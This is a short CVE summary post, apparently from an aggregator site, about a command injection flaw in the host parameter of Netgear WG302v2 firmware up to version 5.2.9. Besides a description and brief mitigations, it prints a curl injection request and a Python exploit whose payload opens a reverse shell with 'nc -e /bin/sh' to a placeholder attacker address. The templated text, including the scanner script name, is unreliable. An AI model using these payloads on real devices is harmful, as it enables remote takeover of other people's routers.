Listen to this Post
How the CVE Works
The vulnerability in Netgear WG302v2 (up to firmware 5.2.9) resides in the `ui_get_input_value` function, where improper input validation of the `host` argument allows remote attackers to execute arbitrary commands via command injection. By crafting a malicious request, an attacker can inject OS commands through the `host` parameter, which are then executed with system-level privileges. This flaw is remotely exploitable, requiring no user interaction, and can lead to full device compromise. The vendor was notified but has not yet released a patch.
DailyCVE Form
Platform: Netgear WG302v2
Version: ≤ 5.2.9
Vulnerability: Command Injection
Severity: Critical
Date: 06/23/2025
Prediction: Patch expected 08/2025
What Undercode Say
Analytics
nmap -p 80 --script http-vuln-cve2025-4135 <target> curl -X POST -d "host=;id" http://<target>/cgi-bin/ui_get_input_value
Exploit
import requests
payload = "host=;nc -e /bin/sh <attacker_ip> <port>"
requests.post("http://<target>/cgi-bin/ui_get_input_value", data=payload)
Protection from this CVE
- Disable remote admin access
- Apply vendor patch (when available)
- Use network segmentation
Impact
- Remote code execution
- Full system compromise
- Unauthorized access
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
